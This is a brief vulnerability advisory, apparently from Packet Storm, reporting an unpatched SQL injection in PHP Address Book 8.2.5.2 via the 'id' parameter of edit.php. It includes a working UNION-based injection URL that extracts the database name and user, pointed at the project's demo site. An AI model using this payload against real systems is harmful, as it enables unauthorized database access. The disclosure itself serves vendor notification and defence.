PHP Address Book version 8.2.5.2 suffers from a remote SQL injection vulnerability.
74ce6b4fbc3365f91ad208910228a3874d6c832b0bfb7575b3a009ca64d52058## Full Disclosure
#Exploit Title : PHP Address Book SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 14/Nov/2015
#Home Page Link : http://sourceforge.net/projects/php-addressbook/
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched
1. Description
"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.
2. Proof of Concept
http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+
## Vendor Response
No reply from vendor
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed